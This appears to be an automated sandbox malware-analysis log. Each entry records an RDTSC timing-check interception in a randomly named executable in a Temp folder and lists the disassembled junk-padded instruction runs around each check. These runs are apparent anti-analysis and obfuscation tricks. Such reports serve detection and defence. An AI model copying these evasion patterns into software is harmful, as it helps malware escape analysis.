                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 834654 second address: 834668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888260h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 832893 second address: 8328AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD81D0C8433h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8329D5 second address: 8329EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FD81C888256h 0x0000000d jl 00007FD81C888256h 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8329EB second address: 832A08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8431h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007FD81D0C8426h 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 832A08 second address: 832A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 832B7C second address: 832B9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8439h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 832B9F second address: 832BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 832BA3 second address: 832BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 832E68 second address: 832E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 832E6C second address: 832E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007FD81D0C8430h 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 832FD0 second address: 832FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD81C888256h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 832FE2 second address: 832FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 832FE6 second address: 832FF3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 832FF3 second address: 832FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 832FF8 second address: 832FFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 832FFE second address: 833004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 833004 second address: 833008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 833165 second address: 833169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8335A3 second address: 8335A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 829BA9 second address: 829BBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 829BBD second address: 829BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD81C88825Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD81C888260h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 829BE4 second address: 829BEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 806F4E second address: 806F65 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD81C888256h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD81C88825Bh 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 806F65 second address: 806F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 806F6B second address: 806F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 833D8E second address: 833D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 837A82 second address: 837A87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 837C45 second address: 837C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jmp 00007FD81D0C8437h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 837C6D second address: 837C80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jo 00007FD81C888264h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 83646D second address: 836493 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FD81D0C8426h 0x00000014 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 836493 second address: 83649D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 83649D second address: 8364A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 837DB4 second address: 837DBE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 837DBE second address: 837DE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD81D0C8432h 0x00000008 jno 00007FD81D0C8426h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push edx 0x0000001b pop edx 0x0000001c popad 0x0000001d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 837DE8 second address: 837E0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888267h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FD81C888256h 0x00000015 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 837E0F second address: 837E15 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 837E15 second address: 837E1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 83A350 second address: 83A359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 80A4E9 second address: 80A4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD81C888258h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 80A4F5 second address: 80A511 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD81D0C8436h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD81D0C842Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84047C second address: 84048C instructions: 0x00000000 rdtsc 0x00000002 js 00007FD81C888262h 0x00000008 jnl 00007FD81C888256h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84048C second address: 840495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84073A second address: 840740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 840740 second address: 840745 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 840745 second address: 84077D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 jmp 00007FD81C888266h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FD81C88825Bh 0x00000018 pop edx 0x00000019 jng 00007FD81C888258h 0x0000001f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 840C13 second address: 840C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 840C19 second address: 840C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 840C21 second address: 840C38 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD81D0C842Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 840DB3 second address: 840DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FD81C888256h 0x0000000d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 843806 second address: 843810 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD81D0C8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 843C16 second address: 843C33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888266h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84427F second address: 844289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD81D0C8426h 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 844289 second address: 84430B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888266h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FD81C888258h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D1AF6h] 0x0000002e and di, F488h 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D179Ch], ebx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007FD81C888258h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000017h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 xchg eax, ebx 0x00000058 js 00007FD81C888260h 0x0000005e pushad 0x0000005f push ecx 0x00000060 pop ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 844EAB second address: 844EC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81D0C8435h 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 844C0E second address: 844C20 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD81C888258h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 844C20 second address: 844C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 844C24 second address: 844C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84579D second address: 8457C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C842Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b ja 00007FD81D0C843Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD81D0C842Ch 0x00000018 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 847AB5 second address: 847AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 je 00007FD81C888256h 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8480C6 second address: 8480CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8480CB second address: 8480D5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD81C88825Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8480D5 second address: 8480F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jmp 00007FD81D0C8438h 0x0000000f pop edi 0x00000010 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8480F8 second address: 848170 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888268h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FD81C888258h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jmp 00007FD81C88825Bh 0x00000029 push 00000000h 0x0000002b sub dword ptr [ebp+122D20DEh], eax 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007FD81C888258h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushad 0x00000052 popad 0x00000053 pushad 0x00000054 popad 0x00000055 popad 0x00000056 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 848B5F second address: 848B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8488C4 second address: 848901 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD81C88826Eh 0x00000008 jmp 00007FD81C888268h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD81C888266h 0x00000019 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 848901 second address: 848907 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 848907 second address: 84890D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84A1BD second address: 84A1C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84ACD4 second address: 84ACF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888266h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FD81C888256h 0x00000013 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84AA7A second address: 84AA99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C842Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD81D0C842Ch 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8517D6 second address: 8517DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8508EF second address: 850904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnp 00007FD81D0C8426h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 850904 second address: 850908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 850908 second address: 85090C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 85090C second address: 850912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
